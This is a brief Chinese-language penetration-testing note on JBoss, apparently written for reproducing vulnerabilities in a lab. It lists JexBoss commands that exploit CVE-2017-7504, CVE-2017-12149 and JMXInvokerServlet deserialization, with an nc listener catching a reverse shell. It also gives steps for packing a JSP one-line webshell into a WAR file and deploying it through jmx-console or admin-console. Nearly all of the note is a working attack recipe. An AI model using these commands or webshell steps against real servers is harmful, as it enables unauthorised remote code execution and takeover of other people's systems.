JBoss
1.JexBoss
漏洞检测获取交互shell的工具,https://github.com/joaomatosf/jexboss
2.漏洞复现
CVE-2017-7504
python jexboss.py -u http://192.168.135.131:8080/ yes
CVE-2017-12149
先用NC监听
python jexboss.py -u http://192.168.135.131:8080/ yes IP 端口
JMXInvokerServlet-deserialization
先用NC监听
python jexboss.py -u http://192.168.135.131:8080/ yes IP 端口
后台GetShell
登录后台,路径:/jmx-console 或 /admin-console(>5.x要用这个)
如果是/jmx-console,进入flavor=URL,type=DeploymentScanner
如果是/admin-console,进入左列的Web Application (WAR)s
将JSP一句话木马制作为war包
jar cvf shell.war shell.jsp
如果是/jmx-console,找到 java.lang.String 的 addURL,输入一句话木马的URL点击invoke
如果是/admin-console,选择本地文件添加
一句话木马路径:/shell/shell.jsp(根据自己的文件名改)